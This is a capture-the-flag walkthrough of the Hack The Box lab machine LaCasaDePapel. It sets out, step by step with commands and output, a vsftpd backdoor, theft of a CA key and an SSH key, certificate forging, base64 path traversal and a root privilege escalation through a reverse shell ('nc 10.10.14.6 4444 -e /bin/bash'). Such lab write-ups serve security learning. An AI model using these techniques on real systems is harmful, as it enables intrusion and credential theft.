LaCasaDePapel

From Luniwiki
Jump to: navigation, search

Back

LaCasaDePapel01.png

Ports scan

u505@kali:~/HTB/Machines/LaCasaDePapel$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.131 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-20 18:02:41 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 21/tcp on 10.10.10.131 Discovered open port 443/tcp on 10.10.10.131 Discovered open port 22/tcp on 10.10.10.131
u505@kali:~/HTB/Machines/LaCasaDePapel$ nmap -sC -sV 10.10.10.131
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-20 13:09 EST
Nmap scan report for lacasadepapel.htb (10.10.10.131)
Host is up (0.038s latency).
Not shown: 914 closed ports, 82 filtered ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 2.3.4
22/tcp  open  ssh      OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
|   256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
|_  256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
80/tcp  open  http     Node.js (Express middleware)
|_http-title: La Casa De Papel
443/tcp open  ssl/http Node.js Express framework
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: La Casa De Papel
| ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
| Not valid before: 2019-01-27T08:35:30
|_Not valid after:  2029-01-24T08:35:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|   http/1.1
|_  http/1.0
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 35.70 seconds

Port 80

LaCasaDePapel02.png

The page ask for a google authenticator token and an email address. Once provided, the page inform that we need to follow instructions in our mailbox.

LaCasaDePapel03.png

Port 443

The secure web page needs a client certificate to go ahead.

LaCasaDePapel04.png

Port 21

The ftp version is vsftpd 2.3.4, well known for the backdoor.

u505@kali:~/HTB/Machines/LaCasaDePapel$ searchsploit vsftp 2.3.4
---------------------------------------------- ----------------------------------------
 Exploit Title                                |  Path
                                              | (/usr/share/exploitdb/)
---------------------------------------------- ----------------------------------------
vsftpd 2.3.4 - Backdoor Command Execution (Me | exploits/unix/remote/17491.rb
---------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/LaCasaDePapel$ searchsploit -m 17491.rb
  Exploit: vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
      URL: https://www.exploit-db.com/exploits/17491
     Path: /usr/share/exploitdb/exploits/unix/remote/17491.rb
File Type: Ruby script, ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/LaCasaDePapel/17491.rb

The backdoor payload is interesting. In response to a :) smiley face in the FTP username, a TCP callback shell is attempted. Metasploit can send the payload too, but doesn't get a shell.

u505@kali:~/HTB/Machines/LaCasaDePapel$ nc lacasadepapel.htb 6200
Ncat: Connection refused.
u505@kali:~/HTB/Machines/LaCasaDePapel$ ftp lacasadepapel.htb
Connected to lacasadepapel.htb.
220 (vsFTPd 2.3.4)
Name (lacasadepapel.htb:u505): u505:)
331 Please specify the password.
Password:
dsdfs
^C
421 Service not available, remote server has closed connection
u505@kali:~/HTB/Machines/LaCasaDePapel$ nc lacasadepapel.htb 6200
Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman

Instead of a bash shell we have a Psy Shell (This is why metasploit was unable to open a shell).

Psy shell

With php functions we can see the content of the server.

scandir ("/home");
=> [
    ".",
    "..",
    "berlin",
    "dali",
    "nairobi",
    "oslo",
    "professor",
  ]

...

scandir ("/home/berlin");
=> [
    ".",
    "..",
    ".ash_history",
    ".ssh",
    "downloads",
    "node_modules",
    "server.js",
    "user.txt",
  ]
echo readfile("/home/berlin/user.txt");
PHP Warning:  readfile(/home/berlin/user.txt): failed to open stream: Permission denied in phar://eval()'d code on line 1

The user flag in in berlin home directory, but not available.

scandir("/home/dali/.ssh");
=> [
    ".",
    "..",
    "authorized_keys",
    "known_hosts",
  ]
readfile("/home/dali/.ssh/authorized_keys");
ssh-rsa 
AAAAB3NzaC1yc2EAAAABIwAAAQEAsDHKXtzjeyuWjw42RbtoDy2c6lWdtfEzsmqmHrbJDY2hDcKWekWouWhe/NTCQFim6weKtsEdTzh0Qui+6jKc8/ZtpKzHrXiSXSe48JwpG7abmp5iCihzDozJqggBNoAQrvZqBhg6svcKh8F0kTnxUkBQgBm4kjOPteN+TfFoNIod7DQ72/N25D/lVThCLcStbPkR8fgBz7TGuTTAsNFXVwjlsgwi2qUF9UM6C1JkMBk5Y9ssDHiu4R35R5eCl4EEZLL946n/Gd5QB7pmIRHMkmt2ztOaKU4xZthurZpDXt+Et+Rm3dAlAZLO/5dwjqIfmEBS1eQ4sT8hlUkuLvjUDw== thek@ThekMac.local
=> 400

Dali authorize access by ssh and private key.

scandir ("/home/nairobi");
=> [
    ".",
    "..",
    "ca.key",
    "download.jade",
    "error.jade",
    "index.jade",
    "node_modules",
    "server.js",
    "static",
  ]
readfile("/home/nairobi/ca.key");
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb
7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/
2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl
uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M
YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp
s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us
PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V
Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89
1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ
/CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+
q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr
uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd
I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUweIL9Og
7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE
G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn
sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH
CTbdwePMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y
sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI
ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2
zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/
ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC
9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M
WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM
7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR
aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc
53udBEzjt3WPqYGkkDknVhjD
-----END PRIVATE KEY-----
1704

We found a private key, and the name is ca, perhaps the certificate authority? ...

scandir ("/home/oslo/Maildir/.Sent/cur");
=> [
    ".",
    "..",
    "1582228357085.M22583P98548V0000000000068519I00000000018a624.lacasadepapel.htb,S=430,2,S",
  ]
readfile("/home/oslo/Maildir/.Sent/cur/1582228357085.M22583P98548V0000000000068519I00000000018a624.lacasadepapel.htb,S=430,2,S");
Content-Type: text/plain; format=flowed
From: dali@lacasadepapel.htb
To: 505559U@gmail.com
Content-Transfer-Encoding: 7bit
Date: Thu, 20 Feb 2020 19:52:37 +0000
Message-Id: <1582228357097-cf67b847-00a5d654-9b60e918@lacasadepapel.htb>
MIME-Version: 1.0

Welcome to our community! Thanks for signing up. To continue, please verify your email address by clicking the url below. https://lacasadepapel.htb/8b47e8d0-541a-11ea-b783-f7248254501e
=> 453

The mail was for us. We follow the link.

LaCasaDePapel06.png

We download the ca.crt (ca certificate). We can check if the certificate authority from the web page is the same than the the key of ca we found in nairobi folder.

u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl x509 -noout -pubkey -in ca.crt
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
ZwIDAQAB
-----END PUBLIC KEY-----
u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl rsa -in ca.key -pubout
writing RSA key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
ZwIDAQAB
-----END PUBLIC KEY-----

The public keys match, so we have the certificate authority of the web site.

Client certificate creation

Private key

First we generate our own private key.

u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl genrsa -out u505.key 2048
Generating RSA private key, 2048 bit long modulus (2 primes)
...........................................+++++
..........................................................................................................................................+++++
e is 65537 (0x010001)

Certificate request

u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl req -new -key u505.key -out u505.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:BE
State or Province Name (full name) [Some-State]:BXL
Locality Name (eg, city) []:BXL
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Luniel
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:u505
Email Address []:505559U@gmail.com

Please enter the following 'extra' attributes to be sent with your certificate request A challenge password []: An optional company name []:

Sign our certificate with the CA

u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl x509 -req -days 3650 -in u505.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out u505.crt
Signature ok
subject=C = BE, ST = BXL, L = BXL, O = Luniel, CN = u505, emailAddress = 505559U@gmail.com
Getting CA Private Key

We check the signed certificate

u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl x509 -text -noout -in u505.crt
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number:
            1f:67:d2:c3:74:04:a1:fc:ea:df:11:59:c0:3a:96:f8:ca:50:2c:86
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN = lacasadepapel.htb, O = La Casa De Papel
        Validity
            Not Before: Feb 21 13:31:54 2020 GMT
            Not After : Feb 18 13:31:54 2030 GMT
        Subject: C = BE, ST = BXL, L = BXL, O = Luniel, CN = u505, emailAddress = 505559U@gmail.com
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
                Modulus:
                    00:c1:2c:83:5c:67:85:a3:da:e5:cd:f0:05:45:12:
                    e2:4e:99:11:cf:b4:f6:97:b8:58:93:2d:d1:72:de:
                    28:0e:4d:0d:80:23:4e:c2:48:c5:23:48:0a:8b:4c:
                    4a:c0:e1:36:af:81:ae:dc:ac:cb:e3:a2:e5:2f:00:
                    44:e6:59:5a:58:6c:c0:fd:ea:cc:52:0e:de:c6:5e:
                    37:77:eb:d6:df:9f:c8:fe:14:92:90:ad:f6:d2:03:
                    04:ad:6a:c2:44:e7:2c:31:1d:12:d7:a7:14:4b:16:
                    71:0f:bf:c6:74:9a:9e:2f:1e:b8:3f:8a:37:df:83:
                    8c:bc:d9:c4:12:62:96:ae:19:b1:f9:02:c7:7b:0c:
                    85:92:c7:a7:b2:94:2b:77:5b:ae:8c:39:a7:bc:4e:
                    91:bd:fb:15:7e:da:5c:95:2b:87:61:1c:e7:fe:45:
                    57:98:ac:fc:db:4a:b8:61:93:62:db:cf:35:5e:ea:
                    ad:4f:9d:52:df:0c:9d:b8:99:8c:c5:6f:ce:f8:c3:
                    b0:b8:6b:36:fc:c2:d4:c3:a7:7d:aa:34:e7:c0:45:
                    f8:7c:6f:17:7b:6c:c6:ee:69:e7:b4:03:77:de:4f:
                    2a:12:7d:7d:2c:f1:75:45:c1:41:f5:3c:00:41:e8:
                    a6:e7:a9:c4:72:ba:e0:4d:e2:4f:01:3c:72:d1:61:
                    08:d9
                Exponent: 65537 (0x10001)
    Signature Algorithm: sha256WithRSAEncryption
         ab:4b:d1:d9:e4:11:ed:20:21:04:05:f9:db:84:c8:76:0a:74:
         c3:04:34:5f:6a:c1:4d:0b:bd:73:86:cf:5c:cb:b6:ad:88:e7:
         ae:00:2c:a6:2a:09:1e:0a:f2:f9:37:ab:68:38:54:2b:03:cf:
         98:df:28:ec:cc:6b:a0:b4:85:a1:f1:cd:98:49:58:e3:91:85:
         47:19:72:95:86:d1:29:36:f8:74:66:b4:ac:a8:a5:47:04:24:
         e8:fa:fe:0d:88:98:5a:e3:be:23:22:3d:42:51:a0:00:b5:83:
         97:5c:be:14:bc:bb:ec:1b:83:27:1a:f3:b9:2b:04:53:ac:4d:
         65:1f:8e:e6:b2:a5:4e:d9:a6:5c:5b:1d:7c:ed:11:cc:7d:61:
         f0:1e:8f:bb:a4:2b:1b:ea:54:81:5a:9e:f5:89:b0:9d:39:50:
         ea:21:18:4f:44:f8:e5:a7:9f:e8:d3:a1:e2:f4:db:58:3b:05:
         3c:65:f2:67:8f:1a:a2:83:8d:dc:a9:df:f1:e8:1e:8f:ff:73:
         11:20:c6:9b:62:9c:36:18:41:14:4a:0b:36:df:e9:da:63:b8:
         73:44:ad:57:bf:2d:08:9d:c3:cb:b2:1a:d2:dc:50:59:07:a7:
         75:90:b1:92:ec:4e:69:20:f4:60:35:f2:9a:69:e8:24:53:ca:
         d8:72:64:4e

Create PKCS#12 to import in firefox

u505@kali:~/HTB/Machines/LaCasaDePapel$ openssl pkcs12 -export -in u505.crt -inkey u505.key -out u505.pfx
Enter Export Password:
Verifying - Enter Export Password:

Import certificate in firefox

LaCasaDePapel07.png

Open the web page with the client certificate.

LaCasaDePapel08.png

LaCasaDePapel09.png

Now we are able to access the "private" area of this server.

Digging into the web application

LaCasaDePapel10.png

The application shows directories with the argument path, and the argument file read the file on base64 representation. For example the URL https://lacasadepapel.htb/file/U0VBU09OLTEvMDEuYXZp downloads the file:

u505@kali:~/HTB/Machines/LaCasaDePapel$ echo "U0VBU09OLTEvMDEuYXZp" | base64 -d 
SEASON-1/01.avi

If we test /etc/passwd

u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/`echo -n "/etc/passwd" | base64`  
<!DOCTYPE html>
 <html lang="en">
 <head>
 <meta charset="utf-8">
 <title>Error</title>
 </head>
 <body>
 <pre>Error: ENOENT: no such file or directory, open '/home/berlin/downloads//etc/passwd'<br>    at Object.fs.openSync (fs.js:646:18)<br>    at Object.fs.readFileSync (fs.js:551:33)<br>    at 
 /home/berlin/server.js:32:15<br>    at Layer.handle [as handle_request] (/home/berlin/node_modules/express/lib/router/layer.js:95:5)<br>    at next (/home/berlin/node_modules/express/lib/router/route.js:137:13) <br>    at Route.dispatch (/home/berlin/node_modules/express/lib/router/route.js:112:3)<br>    at Layer.handle [as handle_request] (/home/berlin/node_modules/express/lib/router/layer.js:95:5)<br>    at 
 /home/berlin/node_modules/express/lib/router/index.js:281:22<br>    at param (/home/berlin/node_modules/express/lib/router/index.js:354:14)<br>    at param 
 (/home/berlin/node_modules/express/lib/router/index.js:365:14)</pre>
 </body>
 </html>

The path is relative to /home/berlin/downloads/

User Flag

The URL https://lacasadepapel.htb/?path=../ shows us the user.txt file

LaCasaDePapel11.png

We can download it, and retrieve the content.

u505@kali:~/HTB/Machines/LaCasaDePapel$ echo -n "../user.txt" | base64
Li4vdXNlci50eHQ=
u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/Li4vdXNlci50eHQ=
<USER_FLAG>

Remote shell

Private key

In berlin .ssh folder ( https://lacasadepapel.htb/?path=../.ssh/) there is a file id_rsa

LaCasaDePapel12.png

u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/`echo -n "../.ssh/id_rsa" | base64` --output id_rsaberlin
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3389  100  3389    0     0   5629      0 --:--:-- --:--:-- --:--:--  5620
u505@kali:~/HTB/Machines/LaCasaDePapel$ file id_rsaberlin
id_rsaberlin: OpenSSH private key

We test it

u505@kali:~/HTB/Machines/LaCasaDePapel$ chmod 600 id_rsaberlin
u505@kali:~/HTB/Machines/LaCasaDePapel$ ssh -i id_rsaberlin berlin@lacasadepapel.htb
The authenticity of host 'lacasadepapel.htb (10.10.10.131)' can't be established.
ECDSA key fingerprint is SHA256:rA99W+GVzo0hlABp1vMj9ChhjLwybPhHTpb65AWm7xI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'lacasadepapel.htb,10.10.10.131' (ECDSA) to the list of known hosts.
berlin@lacasadepapel.htb's password:
Permission denied, please try again.
berlin@lacasadepapel.htb's password:
Permission denied, please try again.
berlin@lacasadepapel.htb's password:
berlin@lacasadepapel.htb: Permission denied (publickey,password,keyboard-interactive).

Enumerate users

We can list /home from the webpage

LaCasaDePapel13.png

Or a better solution is to download directly the file /etc/passwd

u505@kali:~/HTB/Machines/LaCasaDePapel$ curl -k --cert u505.crt --cacert ca.crt --key u505.key https://lacasadepapel.htb/file/`echo -n "../../../etc/passwd" | base64`
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin
dali:x:1000:1000:dali,,,:/home/dali:/usr/bin/psysh
berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash
professor:x:1002:1002:professor,,,:/home/professor:/bin/ash
vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin
memcached:x:102:102:memcached:/home/memcached:/sbin/nologin

There is no 5 users as we observed in folder /home but 3:

  • dali
  • berlin
  • professor

Nairobi and Oslo are not real users of the system. Dali is the user assigned to vsftp because the shell is psysh.

User professor

We user professor and the privatekey found in berlin's folder, we gain a full ssh shell with a beautiful banner :)

u505@kali:~/HTB/Machines/LaCasaDePapel$ ssh -i id_rsaberlin professor@lacasadepapel.htb

_ ____ ____ ____ _ | | __ _ / ___|__ _ ___ __ _ | _ \ ___ | _ \ __ _ _ __ ___| | | | / _` | | | / _` / __|/ _` | | | | |/ _ \ | |_) / _` | '_ \ / _ \ | | |__| (_| | | |__| (_| \__ \ (_| | | |_| | __/ | __/ (_| | |_) | __/ | |_____\__,_| \____\__,_|___/\__,_| |____/ \___| |_| \__,_| .__/ \___|_| |_|
lacasadepapel [~]$ whoami professor

Local enumeration

u505@kali:~/HTB/Machines/LaCasaDePapel$ mkdir www
u505@kali:~/HTB/Machines/LaCasaDePapel$ cd www/
u505@kali:~/HTB/Machines/LaCasaDePapel/www$ cp /opt/utils/pspy/pspy64 ./
u505@kali:~/HTB/Machines/LaCasaDePapel/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/LaCasaDePapel/www$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

From the target machine

lacasadepapel [/tmp]$ wget http://10.10.14.6/LinEnum.sh
Connecting to 10.10.14.6 (10.10.14.6:80)
LinEnum.sh           100% |********************************| 46631  0:00:00 ETA
lacasadepapel [/tmp]$ wget http://10.10.14.6/pspy64
Connecting to 10.10.14.6 (10.10.14.6:80)
pspy64               100% |********************************| 3006k  0:00:00 ETA
lacasadepapel [/tmp]$ chmod +x pspy64 LinEnum.sh

Cronjob

2020/02/22 13:44:00 CMD: UID=0    PID=6625   | /sbin/openrc-run /etc/init.d/supervisord restart
2020/02/22 13:44:00 CMD: UID=0    PID=6624   | /sbin/openrc-run /etc/init.d/supervisord restart
2020/02/22 13:44:01 CMD: UID=0    PID=6627   | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord stop
2020/02/22 13:44:01 CMD: UID=0    PID=6642   | start-stop-daemon --stop --exec /usr/bin/supervisord --pidfile /var/run/supervisord.pid
2020/02/22 13:44:01 CMD: UID=0    PID=6650   | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord start
2020/02/22 13:44:01 CMD: UID=0    PID=6649   | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord start
2020/02/22 13:44:01 CMD: UID=0    PID=6652   |
2020/02/22 13:44:01 CMD: UID=0    PID=6664   | start-stop-daemon --start --exec /usr/bin/supervisord --pidfile /var/run/supervisord.pid --background --make-pidfile -- --nodaemon --pidfile /var/run/supervisord.pid --configuration  /etc/supervisord.conf
2020/02/22 13:44:01 CMD: UID=0    PID=6665   | start-stop-daemon --start --exec /usr/bin/supervisord --pidfile /var/run/supervisord.pid --background --make-pidfile -- --nodaemon --pidfile /var/run/supervisord.pid --configuration  /etc/supervisord.conf
2020/02/22 13:44:01 CMD: UID=0    PID=6668   | /bin/sh /lib/rc/sh/openrc-run.sh /etc/init.d/supervisord start
2020/02/22 13:44:01 CMD: UID=0    PID=6672   | /usr/bin/python2 /usr/bin/supervisord --nodaemon --pidfile /var/run/supervisord.pid --configuration /etc/supervisord.conf
2020/02/22 13:44:02 CMD: UID=0    PID=6673   | sudo -u nobody /usr/bin/node /home/professor/memcached.js

We cannot access file /etc/supervisord.conf

lacasadepapel [~]$ cat /etc/supervisord.conf
cat: can't open '/etc/supervisord.conf': Permission denied
lacasadepapel [~]$ ls -l /etc/supervisord.conf
-rw-------    1 root     root           313 Jan 29  2019 /etc/supervisord.conf

We don't have access to /home/professor/memcached.js neither, but we have access to a file next to it.

lacasadepapel [~]$ ls -ltr
total 12
-rw-r-----    1 root     nobody         434 Jan 29  2019 memcached.js
-rw-r--r--    1 root     root            88 Jan 29  2019 memcached.ini
drwxr-sr-x    9 root     professo      4096 Jan 29  2019 node_modules

The ini file contains the sudo command run on the cronjob.

lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js

Escalation of privileges

Raise of listener

u505@kali:~/HTB/Machines/LaCasaDePapel/www$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Change memcached.ini

The file is read only. But it is on professor's folder.

lacasadepapel [~]$ ls -lta
total 24
drwxr-sr-x    4 professo professo      4096 Mar  6  2019 .
drwxr-xr-x    7 root     root          4096 Feb 16  2019 ..
drwx------    2 professo professo      4096 Jan 31  2019 .ssh
drwxr-sr-x    9 root     professo      4096 Jan 29  2019 node_modules
-rw-r--r--    1 root     root            88 Jan 29  2019 memcached.ini
-rw-r-----    1 root     nobody         434 Jan 29  2019 memcached.js
lrwxrwxrwx    1 root     professo         9 Nov  6  2018 .ash_history -> /dev/null

We are allowed to move the file.

lacasadepapel [~]$ mv memcached.ini memcached.ini.org

And we can create our own file

lacasadepapel [~]$ vi memcached.ini
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = nc 10.10.14.6 4444 -e /bin/bash

Reverse shell

Once the crontab ran, we gain the reverse shell

u505@kali:/home$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.131.
Ncat: Connection from 10.10.10.131:34955.
whoami
root
python -c "import pty;pty.spawn('/bin/bash')"

Root flag

bash-4.4# cat /root/root.txt
cat /root/root.txt
<ROOT_FLAG>

References

Daniel Simao 13:00, 20 February 2020 (EST)